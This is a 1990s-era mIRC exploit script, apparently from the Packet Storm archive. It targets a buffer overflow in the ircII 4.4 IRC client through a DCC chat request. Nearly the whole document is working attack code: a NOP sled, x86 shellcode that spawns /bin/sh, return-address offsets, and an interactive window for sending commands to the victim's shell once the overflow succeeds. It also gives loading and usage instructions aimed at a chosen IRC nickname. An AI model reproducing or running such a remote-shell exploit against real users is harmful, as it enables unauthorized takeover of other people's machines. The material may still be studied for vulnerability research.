ide_expl.mrc is an ircii-4-4 exploit ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat request instead of having them chat you, attempts to execute /bin/sh.
07bb96538921b3cdfee62b6c246d8843f69f27f4c4ae7b182d900f7f81eee2fb; ide_expl.mrc: vade79 -> _v9[v9@fakehalo.org], www.fakehalo.org.
;
; ircii-4-4 exploit->ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat
; request instead of having them chat you, result is the same.
;
; Wrote directly from ircii-4.4.c(for *nix), that someone gave me to port to mirc.
;
; Exploit to overflow a buffer. Although, more often than not it will crash/seg fault
; with both versions of this exploit, by default offsets. (exploit noted as being for
; V4.4, and patched in V4.4M)
;
; ircii-4.4.c by: bladi & aLmUDeNa.
; ide_expl.mrc(this) by: _v9(vade79).
;
; Also included in the exploit(ircii4.4.c) were some other offsets:
;
; "SuSe 6.x :0xbfffe3ff"
; "RedHat :0xbfffe888"
;
; To load this script into mIRC5.7: /load -rs <path/to/file.mrc>
;
; NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if
; the connection still exists, so if you see a /sockwrite error in the status window, the user
; probably seg faulted.
alias -l bin {
if ($len($1) != 2) { return }
var %i, %j, %k
if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }
else { %i = $left($1,1) }
if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }
else { %j = $right($1,1) }
while (%i) { %k = %k + 16 | dec %i }
return $calc(%k + %j)
}
alias -l make_string {
var %i = 1, %j
while ($gettok($replace($1,\x,\),0,92) >= %i) {
%j = %j $bin($gettok($replace($1,\x,\),%i,92))
inc %i
}
return %j
}
alias -l wn return @ircii4.4_dcc_exploit
alias -l sw {
if ($2) {
if ($sock(exp_ide).status != active) {
if ($window($wn)) { window -c $wn }
echo -a Connection lost/non-existant. ( $+ %ide.status $+ )
}
else {
if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }
sockwrite $1-
}
}
}
alias -l main {
if ($window($wn)) { window -c $wn } | window -aek $wn
echo $wn *** [01]: sending DCC chat request, waiting...
set %ide.nick $1 | set %ide.port $rand(1024,4096)
while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }
sockclose exp_ide_base | socklisten exp_ide_base %ide.port
.quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)
}
alias exploit_ircii {
if ($server) {
if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }
elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }
elseif ($1) { main $1 }
else { echo -a Syntax: /exploit_ircii <nick> }
}
}
on 1:SOCKREAD:exp_ide: {
if ($sockerr > 0) return
:read
sockread %data
if ($sockbr == 0) return
if (%data == $null) var %data = (no data)
if ($window($wn)) { echo $wn -> %data }
goto read
}
on 1:SOCKLISTEN:exp_ide_base: {
sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base
unset %ide.status
if ($window($wn)) {
set %ide.status 0
echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)
bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)
bset &o 1 $make_string(\xff\xbf\xff\xe3)
; ^- try different offsets here.
bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)
bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh
echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)
inc %ide.status
echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.
var %i = 0
while (%i < 47) {
sw exp_ide &nops
inc %i
}
inc %ide.status
echo $wn *** [--]: * (2/4) sent, now sending the shell code.
sw exp_ide &shellcode
%i = 0 | while (%i < 9999) { inc %i }
inc %ide.status
echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.
%i = 0
while (%i < 299) {
var %j = 0 | while (%j < 499) { inc %j }
var %j = 1
while ($bvar(&o,%j)) {
bset &bit 1 $bvar(&o,%j)
sw exp_ide &bit
inc %j
}
inc %i
}
inc %ide.status
echo $wn *** [--]: * (4/4) sent, done.
}
else { sockclose exp_ide }
}
on 1:SOCKCLOSE:exp_ide: {
if ($window($wn)) { window -c $wn }
echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )
unset %ide.*
}
on 1:CLOSE:@: {
if ($target == $wn) {
if ($sock(exp_ide)) { sockclose exp_ide }
if ($sock(exp_ide_base)) { sockclose exp_ide_base }
unset %ide.*
}
}
on 1:INPUT:@: {
if ($active == $wn) {
if ($sock(exp_ide).status == active) {
if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }
else { echo $wn <- $1- | sw -n exp_ide $1- }
}
else { echo $wn *** Error, socket status isn't online yet. }
halt
}
}
on 1:LOAD: {
if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }
else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii <nick>. }
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed